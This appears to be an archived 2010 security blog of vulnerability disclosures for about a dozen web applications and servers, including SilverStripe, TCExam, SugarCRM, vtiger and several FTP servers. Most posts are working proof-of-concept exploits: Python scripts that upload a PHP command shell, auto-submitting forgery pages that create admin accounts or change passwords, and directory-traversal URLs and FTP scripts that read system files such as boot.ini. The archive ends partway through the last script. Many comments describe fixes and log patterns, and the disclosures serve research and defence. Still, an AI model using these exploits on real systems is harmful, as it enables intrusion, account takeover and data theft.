
Monday, June 7, 2010

SilverStripe CMS 2.4.0 Arbitrary Upload

An arbitrary upload vulnerability in SilverStripe CMS 2.4.0 can be exploited to upload a PHP shell. A user account with File & Images permission is necessary to exploit this vulnerability.

PoC
Silverstripe-Shell.py
import sys, socket, re
# Target and credential settings for the SilverStripe 2.4.0 upload PoC that
# follows (Python 2: print statements, str-based sockets). The post states
# the account used must hold the "File & Images" permission.
host = '192.168.1.4'
path = '/silverstripe'
username = 'admin'
password = 'Password1'
port = 80

def send_request(request):
    # Sends one raw HTTP request string over a fresh TCP connection and
    # returns everything read back as a single str.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.settimeout(8)

    s.send(request)

    resp = ''

    while 1:
        r = s.recv(8192)
        if not r: break
        resp += r
        # Stops early when a chunk begins with this 15-byte status line;
        # otherwise reads until the peer closes (an 8 s stall raises
        # socket.timeout, which is not caught here).
        if r[:15] == 'HTTP/1.1 302 OK': break

    s.close()

    return resp

def upload_shell():
    # PoC flow in four HTTP exchanges: (1) form login, (2) multipart upload
    # of the payload under a .jpg name with an image/jpeg part type, (3) fetch
    # of the new file's edit form to collect SecurityID and OwnerID, (4) save
    # of the DetailForm with Name=shell.php. The extension only changes in
    # step 4, so the server-side fix is to re-run the upload-time filename /
    # extension validation on rename; in logs, an image upload followed at
    # once by a rename to .php in the assets admin is the sequence to alert on.
    print 'authenticating'

    # Step 1: credentials come from the module-level settings.
    content = 'AuthenticationMethod=MemberAuthenticator&Email=' + username + '&Password='+ password + '&action_dologin=Log+in'

    header = 'POST http://' + host + path + '/Security/LoginForm HTTP/1.1\r\n'\
        'Host: ' + host + '\r\n'\
        'Connection: keep-alive\r\n'\
        'User-Agent: x\r\n'\
        'Content-Length: ' + str(len(content)) + '\r\n'\
        'Cache-Control: max-age=0\r\n'\
        'Origin: http://' + host + '\r\n'\
        'Content-Type: application/x-www-form-urlencoded\r\n'\
        'Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n'\
        'Accept-Encoding: gzip,deflate,sdch\r\n'\
        'Accept-Language: en-US,en;q=0.8\r\n'\
        'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'\
        '\r\n'

    resp = send_request(header + content)

    print 'uploading shell'

    # Keep the Set-Cookie value that starts with PHPSESSID; it is replayed
    # on every later request as the session.
    match = re.findall(u'Set-Cookie:\s([^\r\n]+)', resp)

    for m in match:
        if m[:9] == 'PHPSESSID':
            cookie = m

    # Step 2: multipart body. "Files[0]" carries the PHP payload declared as
    # image/jpeg under a .jpg filename; ID, FolderID, action_doUpload,
    # Files[1], MAX_FILE_SIZE and action_upload are sent as plain parts.
    content = '------x\r\n'\
        'Content-Disposition: form-data; name="ID"\r\n'\
        '\r\n'\
        '0\r\n'\
        '------x\r\n'\
        'Content-Disposition: form-data; name="FolderID"\r\n'\
        '\r\n'\
        '0\r\n'\
        '------x\r\n'\
        'Content-Disposition: form-data; name="action_doUpload"\r\n'\
        '\r\n'\
        '1\r\n'\
        '------x\r\n'\
        'Content-Disposition: form-data; name="Files[1]"; filename=""\r\n'\
        '\r\n'\
        '\r\n'\
        '------x\r\n'\
        'Content-Disposition: form-data; name="Files[0]"; filename="shell.jpg"\r\n'\
        'Content-Type: image/jpeg\r\n'\
        '\r\n'\
        '<?php echo "<pre>" + system($_GET["CMD"]) + "</pre>"; ?>\r\n'\
        '------x\r\n'\
        'Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n'\
        '\r\n'\
        '\r\n'\
        '------x\r\n'\
        'Content-Disposition: form-data; name="action_upload"\r\n'\
        '\r\n'\
        'Upload Files Listed Below\r\n'\
        '------x--\r\n'\

    header = 'POST http://' + host + path + '/admin/assets/UploadForm HTTP/1.1\r\n'\
        'Host: ' + host + '\r\n'\
        'Proxy-Connection: keep-alive\r\n'\
        'User-Agent: x\r\n'\
        'Content-Length: ' + str(len(content)) + '\r\n'\
        'Cache-Control: max-age=0\r\n'\
        'Origin: http://' + host + '\r\n'\
        'Content-Type: multipart/form-data; boundary=----x\r\n'\
        'Accept: text/html\r\n'\
        'Accept-Encoding: gzip,deflate,sdch\r\n'\
        'Accept-Language: en-US,en;q=0.8\r\n'\
        'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'\
        'Cookie: ' + cookie + '\r\n'\
        '\r\n'

    resp = send_request(header + content)

    print 'grabbing ids'

    # Step 3: the upload response carries "/* IDs: n */" and "/* Names: ... */"
    # comments; the new file's id and stored name are pulled from them.
    file_id = re.search(u'/\*\sIDs:\s(\d+)\s\*/', resp).group(1)
    file_name = re.search(u'/\*\sNames:\s([^\*]+)\s\*/', resp).group(1)

    resp = send_request('GET http://' + host + path + '/admin/assets/EditForm/field/Files/item/' + file_id + '/edit?ajax=1 HTTP/1.1\r\n'\
        'Host: ' + host + '\r\n'\
        'Cookie: ' + cookie + '\r\n\r\n')

    print 'renaming shell'

    # SecurityID is the edit form's own hidden token, read back with the same
    # session, so a per-form token alone does not stop an authenticated user
    # here; OwnerID is taken from the pre-selected option in the form.
    security_id = re.search(u'name="SecurityID" value="(\d+)"', resp).group(1)
    owner_id = re.search(u'option selected="selected" value="(\d+)"', resp).group(1)

    # Step 4: DetailForm save with Name=shell.php, the harvested ids, and the
    # session cookie plus PastMember=1.
    content = 'Title=' + file_name + '&Name=shell.php&FileType=JPEG+image+-+good+for+photos&Size=56+bytes&OwnerID=' + owner_id + '&Dimensions=x&ctf%5BchildID%5D=' + file_id + '&ctf%5BClassName%5D=File&SecurityID=' + security_id + '&action_saveComplexTableField=Save'

    header = 'POST http://' + host + path + '/admin/assets/EditForm/field/Files/item/' + file_id + '/DetailForm HTTP/1.1\r\n'\
        'Host: ' + host + '\r\n'\
        'Proxy-Connection: keep-alive\r\n'\
        'User-Agent: x\r\n'\
        'Referer: http://' + host + path + '/admin/assets/EditForm/field/Files/item/' + file_id + '/edit?ajax=1\r\n'\
        'Content-Length: ' + str(len(content)) + '\r\n'\
        'Cache-Control: max-age=0\r\n'\
        'Origin: http://' + host + '\r\n'\
        'Content-Type: application/x-www-form-urlencoded\r\n'\
        'Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n'\
        'Accept-Encoding: gzip,deflate,sdch\r\n'\
        'Accept-Language: en-US,en;q=0.8\r\n'\
        'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'\
        'Cookie: ' + cookie + '; PastMember=1\r\n'\
        '\r\n'

    resp = send_request(header + content)

    print 'shell located at http://' + host + path + '/assets/shell.php'

# Script entry point: runs the PoC unconditionally on import/execution.
upload_shell()

Tuesday, June 1, 2010

TCExam 10.1.006 Arbitrary Upload

An arbitrary upload vulnerability in tce_functions_tcecode_editor.php of TCExam 10.1.006 can be exploited to upload a PHP shell.

PoC
TCExam-Shell.py
import sys, socket
# Target settings for the TCExam 10.1.006 upload PoC that follows (Python 2).
host = 'localhost'
tc_exam = 'http://' + host + '/TCExam'
port = 80

def upload_shell():
    # Opens one TCP connection, POSTs a multipart body to the tcecode editor
    # endpoint, then requests the stored file from /cache on the same
    # connection to confirm it is served.
    # Defender notes, from what this request shows: the only cookie sent is
    # LastVisit (no session cookie), which suggests the endpoint did not
    # require an authenticated session — confirm against the application;
    # the part is declared application/octet-stream with a .php name; and
    # the file is served from /cache. Fixes: authenticate the endpoint,
    # allow-list upload extensions, and keep /cache non-executable.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.settimeout(8)

    # Two parts: sendfile0 names the target file, userfile0 carries its body.
    content = '------x\r\n'\
        'Content-Disposition: form-data; name="sendfile0"\r\n'\
        '\r\n'\
        'shell.php\r\n'\
        '------x\r\n'\
        'Content-Disposition: form-data; name="userfile0"; filename="shell.php"\r\n'\
        'Content-Type: application/octet-stream\r\n'\
        '\r\n'\
        '<?php echo "<pre>" + system($_GET["CMD"]) + "</pre>"; ?>\r\n'\
        '------x--\r\n'\
        '\r\n'

    header = 'POST ' + tc_exam + '/admin/code/tce_functions_tcecode_editor.php HTTP/1.1\r\n'\
        'Host: ' + host + '\r\n'\
        'Proxy-Connection: keep-alive\r\n'\
        'User-Agent: x\r\n'\
        'Content-Length: ' + str(len(content)) + '\r\n'\
        'Cache-Control: max-age=0\r\n'\
        'Origin: null\r\n'\
        'Content-Type: multipart/form-data; boundary=----x\r\n'\
        'Accept: text/html\r\n'\
        'Accept-Encoding: gzip,deflate,sdch\r\n'\
        'Accept-Language: en-US,en;q=0.8\r\n'\
        'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'\
        'Cookie: LastVisit=1275442604\r\n'\
        '\r\n'

    s.send(header + content)

    http_ok = 'HTTP/1.1 200 OK'

    # Success is judged solely on the status line of the first 8192 bytes.
    if http_ok not in s.recv(8192):
        print 'error uploading shell'
        return
    else: print 'shell uploaded'

    # Second request reuses the same connection (keep-alive was requested).
    s.send('GET ' + tc_exam + '/cache/shell.php HTTP/1.1\r\n'\
        'Host: ' + host + '\r\n\r\n')

    if http_ok not in s.recv(8192): print 'shell not found'
    else: print 'shell located at ' + tc_exam + '/cache/shell.php'

# Script entry point: runs the PoC unconditionally on import/execution.
upload_shell()

Sunday, May 30, 2010

Fiddler XSRF Inspector 1.0 Released

Download



Overview
Fiddler XSRF Inspector is a plugin for Fiddler 2 that extracts cross-site request forgery attacks from HTTP requests.

Installation
Copy FiddlerXSRF.dll to the Fiddler 2 Inspectors folder, generally %ProgramFiles%\Fiddler2\Inspectors

Instructions
1) Capture the request that is going to be used to create a cross-site request forgery attack.
2) Navigate to the XSRF tab under inspectors to see the generated HTML. If the request uses the POST method, the option to convert it to GET will be available.
3) Click the Test button and observe the results.

Change Log
1.0
Initial Release

SugarCRM Community Edition 5.5.2 Cross-site Request Forgery

A cross-site request forgery vulnerability in SugarCRM Community Edition 5.5.2 can be exploited to create a new admin.

PoC
<html>
<body onload="document.forms[0].submit()">
<!-- Auto-submitted POST to the Users module Save action. None of the
     fields below is an anti-forgery token, which is the weakness the post
     describes; the application-side fix is a per-session token checked on
     Save (SameSite cookies add a second layer). -->
<form method="POST" action="http://192.168.1.4/sugarcrm/index.php">
<input type="hidden" name="display_tabs_def" value="display_tabs[]=Home&amp;display_tabs[]=Dashboard&amp;display_tabs[]=Calendar&amp;display_tabs[]=Activities&amp;display_tabs[]=Leads&amp;display_tabs[]=Contacts&amp;display_tabs[]=Accounts&amp;display_tabs[]=Opportunities&amp;display_tabs[]=Emails&amp;display_tabs[]=Campaigns&amp;display_tabs[]=Cases&amp;display_tabs[]=Documents&amp;" />
<input type="hidden" name="hide_tabs_def" value="" />
<input type="hidden" name="remove_tabs_def" value="" />
<input type="hidden" name="module" value="Users" />
<input type="hidden" name="record" value="" />
<input type="hidden" name="action" value="Save" />
<input type="hidden" name="page" value="EditView" />
<input type="hidden" name="return_module" value="Users" />
<input type="hidden" name="return_id" value="" />
<input type="hidden" name="return_action" value="DetailView" />
<input type="hidden" name="password_change" value="true" />
<input type="hidden" name="required_password" value="1" />
<input type="hidden" name="user_name" value="" />
<input type="hidden" name="type" value="" />
<input type="hidden" name="is_group" value="0" />
<input type="hidden" name="portal_only" value="" />
<!-- The privilege-granting fields: is_admin, is_current_admin, UserType. -->
<input type="hidden" name="is_admin" value="1" />
<input type="hidden" name="is_current_admin" value="1" />
<input type="hidden" name="required_email_address" value="0" />
<input type="hidden" name="sugar_user_name" value="new_admin" />
<input type="hidden" name="unique_name" value="" />
<input type="hidden" name="first_name" value="" />
<input type="hidden" name="status" value="Active" />
<input type="hidden" name="last_name" value="a" />
<input type="hidden" name="UserType" value="Administrator" />
<input type="hidden" name="old_password" value="" />
<input type="hidden" name="new_password" value="Password1" />
<input type="hidden" name="confirm_new_password" value="Password1" />
<input type="hidden" name="emailAddressWidget" value="1" />
<input type="hidden" name="emailAddress0" value="" />
<input type="hidden" name="emailAddressPrimaryFlag" value="emailAddress0" />
<input type="hidden" name="emailAddressVerifiedFlag0" value="true" />
<input type="hidden" name="emailAddressVerifiedValue0" value="" />
<input type="hidden" name="useEmailWidget" value="true" />
<input type="hidden" name="email_link_type" value="sugar" />
<input type="hidden" name="mail_smtpuser" value="" />
<input type="hidden" name="mail_smtppass" value="" />
<input type="hidden" name="employee_status" value="Active" />
<input type="hidden" name="title" value="" />
<input type="hidden" name="phone_work" value="" />
<input type="hidden" name="department" value="" />
<input type="hidden" name="phone_mobile" value="" />
<input type="hidden" name="reports_to_name" value="" />
<input type="hidden" name="reports_to_id" value="" />
<input type="hidden" name="phone_other" value="" />
<input type="hidden" name="phone_fax" value="" />
<input type="hidden" name="phone_home" value="" />
<input type="hidden" name="messenger_type" value="" />
<input type="hidden" name="messenger_id" value="" />
<input type="hidden" name="address_street" value="" />
<input type="hidden" name="address_city" value="" />
<input type="hidden" name="address_state" value="" />
<input type="hidden" name="address_postalcode" value="" />
<input type="hidden" name="address_country" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="receive_notifications" value="12" />
<input type="hidden" name="export_delimiter" value="," />
<input type="hidden" name="mailmerge_on" value="0" />
<input type="hidden" name="reminder_time" value="60" />
<input type="hidden" name="default_export_charset" value="ISO-8859-1" />
<input type="hidden" name="user_max_tabs" value="12" />
<input type="hidden" name="user_max_subtabs" value="12" />
<input type="hidden" name="user_subpanel_tabs" value="on" />
<input type="hidden" name="dateformat" value="m/d/Y" />
<input type="hidden" name="currency" value="-99" />
<input type="hidden" name="timeformat" value="H:i" />
<input type="hidden" name="default_currency_significant_digits" value="2" />
<input type="hidden" name="timezone" value="Africa/Abidjan" />
<input type="hidden" name="ut" value="0" />
<input type="hidden" name="num_grp_sep" value="," />
<input type="hidden" name="default_locale_name_format" value="s f l" />
<input type="hidden" name="dec_sep" value="." />
<input type="hidden" name="calendar_publish_key" value="" />
<input type="hidden" name="outboundtest_from_address" value="" />
</form>
</body>
</html>

Thursday, May 27, 2010

Core FTP Server 1.0.343 Directory Traversal

It's possible to navigate the local file system of a server running Core FTP Server 1.0.343 by using a specially crafted URL.

Exploit
/...

PoC
list_root.py
import sys, socket, re

# Connection settings for the Core FTP Server 1.0.343 traversal PoC that
# follows (Python 2). Anonymous login with a throwaway password.
host = 'localhost'
port = 21
user = 'anonymous'
password = 'a'

buffer_size = 8192
timeout = 8

def recv(s):
    # Reads from socket `s` in buffer_size chunks until the peer closes and
    # returns everything as one str. A stall beyond the socket's timeout
    # raises socket.timeout rather than returning what was read.
    resp = ''

    while 1:
        r = s.recv(buffer_size)
        if not r: break
        resp += r

    return resp

def list_root():
    # Logs in on the control channel, sends a CWD whose argument is the
    # '/...' component repeated 16 times (the traversal the post describes),
    # and on a 250 reply opens a passive data connection and prints LIST.
    # Server-side mitigation is to canonicalize the requested path and refuse
    # anything that resolves outside the configured root; a CWD carrying
    # '/...' segments is the pattern to alert on in FTP logs.
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        s.settimeout(timeout)

        print s.recv(buffer_size)

        s.send('USER ' + user + '\r\n')
        print s.recv(buffer_size)

        s.send('PASS ' + password + '\r\n')
        print s.recv(buffer_size) + s.recv(buffer_size)

        s.send('CWD ' + '/...' * 16 + '\r\n')

        resp = s.recv(buffer_size)

        print resp

        if resp[:3] == '250':
            s.send('PASV\r\n')
            resp = s.recv(buffer_size)

            print resp

            # Six comma-separated numbers: four address octets, then the
            # data port split into high and low bytes.
            pasv_info = re.search(u'(\d+),(\d+),(\d+),(\d+),(\d+),(\d+)', resp)

            if (pasv_info == None):
                print 'Invalid PASV response: ' + resp
                return

            s.send('LIST\r\n')

            # The data connection goes to the configured host; only the port
            # is taken from the PASV reply. s2 is never closed explicitly.
            s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s2.connect((host, int(pasv_info.group(5)) * 256 + int(pasv_info.group(6))))
            s2.settimeout(timeout)

            print recv(s2)

        s.close()

    # Any failure (including socket.timeout) is printed, not re-raised.
    except Exception:
        print sys.exc_info()

# Script entry point: runs the PoC unconditionally on import/execution.
list_root()

Home FTP Server 1.10.2.143 Directory Traversal

A directory traversal vulnerability in Home FTP Server 1.10.2.143 can be exploited to read, write, and delete files outside of the ftp root directory.

Exploit
RETR [Drive Letter]:\[Filename]
STOR [Drive Letter]:\[Filename]
DELE [Drive Letter]:\[Filename]


PoC
get_boot_ini.py
import sys, socket, re

# Connection settings for the Home FTP Server 1.10.2.143 traversal PoC that
# follows (Python 2). Anonymous login with an empty password.
host = 'localhost'
port = 21
user = 'anonymous'
password = ''

timeout = 8

buffer_size = 8192

def get_data_port(s):
    # Sends PASV on control socket `s` and returns the data port computed
    # from the last two numbers of the reply (high byte * 256 + low byte).
    # Raises Exception carrying the raw reply when six comma-separated
    # numbers are not found in it.
    s.send('PASV\r\n')

    resp = s.recv(buffer_size)

    # The pattern expands to five '(\d+),' groups followed by a sixth '(\d+)'.
    pasv_info = re.search(u'(\d+),' * 5 + u'(\d+)', resp)

    if (pasv_info == None):
        raise Exception(resp)

    return int(pasv_info.group(5)) * 256 + int(pasv_info.group(6))

def retr_file(s, filename):
    # Requests `filename` with RETR over control socket `s` and returns the
    # first recv() (up to 8192 bytes) from the passive data connection.
    # Raises Exception carrying the reply when the control reply is not 150.
    pasv_port = get_data_port(s)

    # get_data_port raises rather than returning None, so this branch is
    # not reached in practice.
    if (pasv_port == None):
        return None

    s.send('RETR ' + filename + '\r\n')
    resp = s.recv(8192)

    if resp[:3] != '150': raise Exception(resp)

    print resp

    # Short (2 s) timeout on the data socket; a stall raises socket.timeout.
    s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s2.connect((host, pasv_port))
    s2.settimeout(2.0)
    resp = s2.recv(8192)
    s2.close()

    return resp

def get_file(filename):
    # Logs in, prints each control-channel reply, prints the data returned
    # for `filename`, then prints the reply that follows the transfer.
    # The caller passes a drive-qualified path (c:\boot.ini), which is the
    # traversal the post describes: the server-side fix is to resolve
    # RETR/STOR/DELE arguments against the FTP root and reject absolute or
    # drive-qualified paths before touching the file system.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.settimeout(timeout)

    print s.recv(buffer_size)

    s.send('USER ' + user + '\r\n')
    print s.recv(buffer_size)

    s.send('PASS ' + password + '\r\n')
    print s.recv(buffer_size)

    print retr_file(s, filename)

    print s.recv(buffer_size)

    s.close()

# Script entry point: fetches a drive-qualified path on execution.
get_file('c:\\boot.ini')

Wednesday, May 26, 2010

Brekeke PBX 2.4.4.8 Cross-site Request Forgery

A cross-site request forgery vulnerability in Brekeke PBX 2.4.4.8 can be exploited via a GET request to change the admin password.

PoC
<html>
<body>
<!-- The state change is triggered by a plain GET that the browser issues
     while loading the image. Application-side fix: accept PbxUserEdit
     store operations only via POST with an anti-forgery token; SameSite
     cookies add a second layer. -->
<img src="http://localhost:28080/pbx/gate?bean=pbxadmin.web.PbxUserEdit&user=sa&disabled=false&name=&language=en&password=new_password&password2=new_password&phoneforward=&ringertime=60&noanswerforward=vmsa&noanswerforward.voicemail=on&busyforward=vmsa&busyforward.voicemail=on&dtmfcommand=true&defaultpickup=&index=1&greetingtype=3&recordlength=&messageforward=&email=&emailnotification=true&emailattachment=true&admin=true&userplugin=user&personalivr=&rtprelay=default&payload=&useremotepayload=default&recording=false&canjoin=true&allowjoin=true&aotomonitor=&maxsessioncount=-1&resourcemap=&operation=store" />
</body>
</html>

Pacific Timesheet 6.74 Cross-site Request Forgery

A cross-site request forgery vulnerability in Pacific Timesheet 6.74 can be exploited via a GET request to create a new admin.

PoC
<html>
<body>
<!-- User creation via a GET loaded as an image. Application-side fix:
     accept user-set.do only via POST with an anti-forgery token; SameSite
     cookies add a second layer. -->
<img src="http://localhost/timesheet/user/user-set.do?userId=0&flag=&cloneId=&wizard-page=1&loginX=new_admin&passwordX=password&passwordConfirmX=password&firstName=&lastName=a&uid=&status=A&roleId=1&type=&policyId=1&jobTitle=&groupId=0&billRateId=0&billRate=&payRateId=0&payRate=&salary=&firstDay=5%2F22%2F2010&lastDay=&scheduledDay%5B1%5D=on&scheduledDay%5B2%5D=on&scheduledDay%5B3%5D=on&scheduledDay%5B4%5D=on&scheduledDay%5B5%5D=on&scheduledHours=&scheduledHoursPerDay=&scheduledIn=&scheduledOut=&email=&phone=&mobile=&fax=&timeSheetId=1&carryForward=1&timeFormat=0&locale=en_US&timeZone=America%2FNew_York&apprv0Id=0&apprv0bId=0" />
</body>
</html>

Home FTP Server 1.10.2.143 Cross-site Request Forgery

A cross-site request forgery vulnerability in Home FTP Server 1.10.2.143 can be exploited via a GET request to create an admin account with all permissions (read, write, delete, etc.).

PoC
<html>
<body>
<!-- Account creation via a GET loaded as an image; home=c:\ combined with
     every allow* flag is what makes the new account unrestricted.
     Application-side fix: accept addnewmember only via POST with an
     anti-forgery token. -->
<img src="http://localhost/?addnewmember=new_user&pass=Password1&home=c:\&allowdownload=on&allowupload=on&allowrename=on&allowdeletefile=on&allowchangedir=on&allowcreatedir=on&allowdeletedir=on&virtualdir=&filecontrol=" />
</body>
</html>

Sunday, May 23, 2010

Tele Data's Contact Management Server 0.9 Arbitrary File Write

An arbitrary file write vulnerability in Tele Data's Contact Management Server 0.9 can be exploited to write to the local file system of the server.

PoC
Login as an administrator and navigate to http://localhost/command.html?Cmd=SQL_Save&SQL=hello%20world&FileName=..\..\..\..\..\..\..\..\..\x.txt

Tele Data's Contact Management Server 0.9 Local File Inclusion

A local file inclusion vulnerability in Tele Data's Contact Management Server 0.9 can be exploited to read files from the server file system.

PoC
Login as an administrator and navigate to http://localhost/command.html?Cmd=SQL_Load&FileName=..\..\..\..\..\..\..\..\..\boot.ini

Open Forum Server 2.2 b005 Arbitrary File Write

An arbitrary file write vulnerability in the saveAsAttachment method of Open Forum Server 2.2 b005 can be exploited to write to the local file system of the server.

Exploit
Upload a get.sjs file that calls the vulnerable method. Request the script's containing folder.

PoC
import sys, socket
# Target settings for the Open Forum Server 2.2 b005 file-write PoC that
# follows (Python 2).
host = 'localhost'
port = 80

def send_request(request):
    # Opens a fresh TCP connection, sends the raw request string and returns
    # the concatenation of two recv() calls (see the author's note below).
    # The socket is not closed explicitly.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(32) # sometimes it takes a while
    s.connect((host, port))
    s.send(request)

    response = s.recv(8192) + s.recv(8192) # a hack within a hack

    return response

def write_file():
    # Two requests: (1) attach a get.sjs server-side script whose body calls
    # wiki.saveAsAttachment with a filename built from 256 repeated '..\'
    # segments, then (2) GET the page so the script runs and reports
    # "File Written". For defenders, the two weak points visible here are
    # that saveAsAttachment honours '..' in the attachment name and that an
    # uploaded .sjs is executed when its folder is requested; canonicalizing
    # the target path and refusing executable attachment types closes both.
    try:
        content = '----x--\r\n'\
            'Content-Disposition: form-data; name="file"; filename="get.sjs"\r\n'\
            'Content-Type: application/octet-stream\r\n\r\n'\
            'fileName = "' + '..\\\\' * 256 + 'x.txt";\r\n'\
            'data = "hello, world";\r\n'\
            'user = transaction.getUser();\r\n'\
            'wiki.saveAsAttachment("x",fileName,data,user);\r\n'\
            'transaction.sendPage("File Written");\r\n\r\n'\
            '----x----\r\n'

        # Boundary "--x--" gives the "----x--" delimiter used above.
        response = send_request('POST OpenForum/Actions/Attach?page=OpenForum HTTP/1.1\r\n'
            'Host: ' + host + '\r\n'
            'Content-Type: multipart/form-data; boundary=--x--\r\n'
            'Content-Length: ' + str(len(content)) + '\r\n\r\n' + content)

        if 'HTTP/1.1 302 Redirect' not in response:
            print 'Error writing get.sjs'
            return
        else: print 'get.sjs created'

        response = send_request('GET OpenForum HTTP/1.1\r\n'
            'Host: ' + host + '\r\n\r\n')

        if 'File Written' not in response:
            print 'Error writing to root'
            return
        else: print 'x.txt created in root'

    # Any failure (including socket.timeout) is printed, not re-raised.
    except Exception:
        print sys.exc_info()

# Script entry point: runs the PoC unconditionally on import/execution.
write_file()

Friday, May 21, 2010

vtiger CRM 5.2.0 Shell Upload

A shell upload vulnerability in vtiger CRM 5.2.0 can be exploited to execute arbitrary PHP.

Exploit
Upload a PHP file and append a backslash to the filename_hidden value.


PoC

  1. Login and navigate to http://localhost/index.php?action=upload&module=uploads and upload a PHP file.

  2. Capture the packet using a debugging proxy, append a backslash to the filename_hidden value, and submit it. e.g.

    ------WebKitFormBoundaryihWhA69lH4hKrGBy
    Content-Disposition: form-data; name="filename_hidden"

    shell.php\

  3. Navigate to the uploaded file http://localhost/storage/{Year}/{Month}/{Week}/{file} e.g. http://localhost/storage/2010/May/week3/shell.php

vtiger CRM 5.2.0 XSRF

A cross-site request forgery vulnerability in vtiger CRM 5.2.0 can be exploited to create a new admin. The form values can also be sent via a GET request, but the resulting user does not have admin privileges.

PoC:
<html>
<body onload="document.forms[0].submit()">
<!-- Auto-submitted POST to the Users module Save action with is_admin=on.
     No anti-forgery token is among the fields; the application-side fix is
     a per-session token checked on Save. -->
<form name="EditView" method="post" action="http://localhost/index.php">
<input type="hidden" name="module" value="Users" />
<input type="hidden" name="mode" value="create" />
<input type="hidden" name="action" value="Save" />
<input type="hidden" name="user_name" value="new_user" />
<input type="hidden" name="is_admin" value="on" />
<input type="hidden" name="user_password" value="new_password" />
<input type="hidden" name="confirm_password" value="new_password" />
<input type="hidden" name="email1" value="test@test.com" />
<input type="hidden" name="status" value="Active" />
</form>
</body>
</html>

Saturday, May 15, 2010

Open Forum Server 2.2 b005 Directory Traversal

It's possible to navigate the local file system of a server running Open Forum Server 2.2 b005 by using a specially crafted URL.

Exploit:
%2F../
%5C../
%5C

PoC:
http://localhost/%5C../%5C../%5C../%5C../%5C../%5C../%5C../boot.ini

http://localhost/Admin/Users/Admin/private%5Cpassword.txt


Note: the percent-encoded backslash in the second URL bypasses authentication. However, the response is malformed, so a debugging proxy may be necessary to view it.

Zipserver 1.0 Directory Traversal

It's possible to navigate the local file system of a server running Zipserver 1.0 by using a specially crafted URL.

Exploit:
..%2F/
..%5C/

PoC:
http://localhost/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F/

http://localhost/..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C/

The Uniform Server 5.6.5 XSRF

A cross-site request forgery vulnerability in The Uniform Server 5.6.5 web UI can be exploited to change various administrative passwords.

PoC:
<html>
<head>
<script type="text/javascript">
// On load, builds one hidden iframe per entry in xsrs, each holding a form
// that is written into the frame and submitted by the entry's submitCall.
// Four apanel setup pages are targeted (apsetup, psetup, sslpsetup,
// mqsetup); none of the forms carries an anti-forgery token, which is the
// weakness the post describes. Fix on the server: a per-session token
// validated by each *setup.php handler.
window.onload = function() {
var url = 'http://localhost/apanel';

// Declarative list of the forms to build: action URL, method, the script
// that submits the form, and the fields (type defaults to hidden below).
var xsrs = [
{
"action": url + "/apsetup.php",
"method": "post",
"submitCall": "document.forms[0].submit.click()",
"fields": [
{ "name": "apuser", "value": "new_username" },
{ "name": "appass", "value": "new_password" },
{ "name": "submit", "value": "Change", "type": "submit" }
]
},
{
"action": url + "/psetup.php",
"method": "post",
"submitCall": "document.forms[0].submit.click()",
"fields": [
{ "name": "puser", "value": "new_username" },
{ "name": "ppass", "value": "new_password" },
{ "name": "submit", "value": "Change", "type": "submit" }
]
},
{
"action": url + "/sslpsetup.php",
"method": "post",
"submitCall": "document.forms[0].submit.click()",
"fields": [
{ "name": "puser", "value": "new_username" },
{ "name": "ppass", "value": "new_password" },
{ "name": "submit", "value": "Change", "type": "submit" }
]
},
{
"action": url + "/mqsetup.php",
"method": "post",
"submitCall": "document.forms[0].submit.click()",
"fields": [
{ "name": "qpass", "value": "new_password" },
{ "name": "submit", "value": "Change", "type": "submit" }
]
}
];

for (var x = 0; x < xsrs.length; x++) {
var attackFrame = document.createElement('iframe');

var html = '<html><body><form action="' + xsrs[x].action + '" ' +
'method="' + xsrs[x].method + '">';

for (var y = 0; y < xsrs[x].fields.length; y++) {
html += '<input type="' +
(xsrs[x].fields[y].type != null ?
xsrs[x].fields[y].type : 'hidden') + '" ' +
'name="' + xsrs[x].fields[y].name + '" ' +
'value="' + xsrs[x].fields[y].value + '" />';
}

// '\x3c' is an escaped '<' so this literal does not terminate the
// enclosing <script> element.
html += '</form><script>' + xsrs[x].submitCall + '\x3c/script></body></html>';

document.body.appendChild(attackFrame);

attackFrame.contentDocument.write(html);
}
}
</script>
</head>
<body>
</body>
</html>

Thursday, May 13, 2010

Abyss Web Server X1 XSRF

A cross-site request forgery vulnerability in the Abyss Web Server X1 management console can be exploited to change both the username and password of the logged-in user.


PoC:

<html>
<body onload="document.forms[0].submit()">
<!-- Auto-submitted POST to the console credentials page; the bok field
     mirrors the console's OK button. No anti-forgery token is sent, which
     is the weakness the post describes; the fix is a per-session token
     checked by the credentials handler. -->
<form method="post" action="http://localhost:9999/console/credentials">
<input type="hidden" name="/console/credentials/login"
value="new_username" />
<input type="hidden" name="/console/credentials/password/$pass1"
value="new_password" />
<input type="hidden" name="/console/credentials/password/$pass2"
value="new_password" />
<input type="hidden" name="/console/credentials/bok"
value="%C2%A0%C2%A0OK%C2%A0%C2%A0" />
</form>
</body>
</html>

Tuesday, May 11, 2010

Zervit 0.4 Directory Traversal

It's possible to navigate the local file system of a server running Zervit 0.4 by using a specially crafted HTTP request. The resource path must be relative and the slashes unencoded.

Exploit:
GET /\../ HTTP/1.1

Host: localhost



or


GET //../ HTTP/1.1

Host: localhost


PoC:
zervit0.4-traversal.py
import sys, struct, socket
# Target settings for the Zervit 0.4 traversal PoC (Python 2).
host ='localhost'
port = 80

# One raw GET whose path is '/' followed by 32 unencoded '\..' segments;
